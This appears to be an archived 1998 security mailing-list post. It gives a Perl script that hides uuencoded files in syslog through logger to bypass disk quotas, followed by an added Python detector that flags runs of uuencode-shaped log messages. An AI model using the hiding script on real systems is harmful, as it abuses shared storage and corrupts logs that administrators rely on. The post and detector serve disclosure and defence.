Users can hide files in syslog and extract them later using a script for logging messages.
`
[ http://www.rootshell.com/ ]
From [email protected] Wed Jul 8 10:18:27 1998
Date: Wed, 8 Jul 1998 19:08:41 +0200
From: Paul Boehm <[email protected]>
To: [email protected]
Subject: putsyslog
hi,
users can write messages to syslog and thus hide files in there and
bypass quotas.. later they can extract it if they have read access
to the logfile. i already wrote a perl script that puts an uuencoded
file in syslog... but now im too lazy to write a script/program to
extract it.. anyway, here's putsyslog:
--snip--
#!/usr/bin/perl
#Putsyslog - puts a file in syslog using logger and uuencode
# maybe i'll write a getsyslog someday.. but rather not
#
# [email protected]
$file = shift || "file";
$loglevel = shift || "daemon.info";   # something that goes
                                      # to a pub readable
                                      # logfile
# read uuencode's output line by line; the list form of open runs no shell
open(UU, "-|", "uuencode", $file, $file) or die "cannot run uuencode: $!\n";
while (<UU>) {
    chomp;
    # each line goes to logger as one argument; list-form system() bypasses
    # the shell, so characters such as \ " ' ` and $ arrive unmodified
    system("logger", "-p", $loglevel, "[PUTFILE] $file $_");
}
close(UU);
print "done logging $file to $loglevel\n";
--snip--
--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Name: Paul S. Boehm || Freelance Security Consultant.
Email: [email protected] || PGPkey available at:
Url: http://paul.boehm.org/ || http://paul.boehm.org/paul-pgp.asc
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
There is no reason for any individual to have a computer in their home.
--Ken Olsen (Digital Corp CEO) 1977.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
`
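For spotting this kind of use of the logs, the following is an added example, not part of the original post or of rootshell's archive: a Python check that flags runs of uuencode-shaped syslog messages from a single source. It keys on the structure of uuencode data lines rather than on the `[PUTFILE]` marker, which a user can change freely. It assumes the traditional `Mon DD HH:MM:SS host tag: message` line layout and an encoder that writes a backtick for zero; the function names and the sample log are constructed for illustration.

```python
import binascii
import re

# Traditional syslog layout: "Mon DD HH:MM:SS host tag[pid]: message"
SYSLOG_RE = re.compile(r"^\w{3} +\d+ [\d:]{8} (\S+) ([^\s:\[]+)(?:\[\d+\])?: (.*)$")

def is_uu_line(token):
    """True if token has the shape of one uuencode data line (backtick used for zero)."""
    if not token or not all(0x21 <= ord(c) <= 0x60 for c in token):
        return False
    nbytes = (ord(token[0]) - 0x20) & 0x3F  # first character carries the byte count
    return nbytes > 0 and len(token) - 1 == 4 * ((nbytes + 2) // 3)

def find_uu_runs(lines, min_run=3):
    """Return (host, tag, first_line_no, count) for each run of uuencode-shaped messages."""
    findings, runs = [], {}  # runs: (host, tag) -> [first_line_no, count]
    def close(key):
        first, count = runs.pop(key)
        if count >= min_run:
            findings.append((key[0], key[1], first, count))

    for no, line in enumerate(lines, 1):
        m = SYSLOG_RE.match(line)
        if not m:
            continue
        key, words = (m.group(1), m.group(2)), m.group(3).split()
        if words and is_uu_line(words[-1]):
            runs.setdefault(key, [no, 0])[1] += 1  # tracked per source, so interleaving is fine
        elif key in runs:
            close(key)
    for key in list(runs):
        close(key)
    return sorted(findings, key=lambda f: f[2])

def constructed_log():
    """Constructed sample: ordinary messages plus a 4-line payload logged by user 'alice'."""
    data = bytes(range(1, 181))  # constructed payload: 4 uuencode lines of 45 bytes each
    uu = [binascii.b2a_uu(data[i:i + 45], backtick=True).decode().rstrip("\n")
          for i in range(0, len(data), 45)]
    pre = "Jul  8 19:08:41 host1 alice: [PUTFILE] file "
    log = ["Jul  8 19:08:40 host1 sshd[311]: Accepted password for bob from 192.0.2.7 port 1022 ssh2",
           pre + "begin 644 file"] + [pre + u for u in uu[:2]]
    log.append("Jul  8 19:08:41 host1 CRON[402]: (root) CMD (run-parts /etc/cron.hourly)")
    return log + [pre + u for u in uu[2:]] + [pre + "`", pre + "end"]

if __name__ == "__main__":
    for host, tag, first, count in find_uu_runs(constructed_log()):
        print(f"{host} {tag}: {count} uuencode-shaped messages starting at line {first}")
```

Because `logger` tags messages with the invoking user's name by default, the reported tag usually identifies the account that wrote the data.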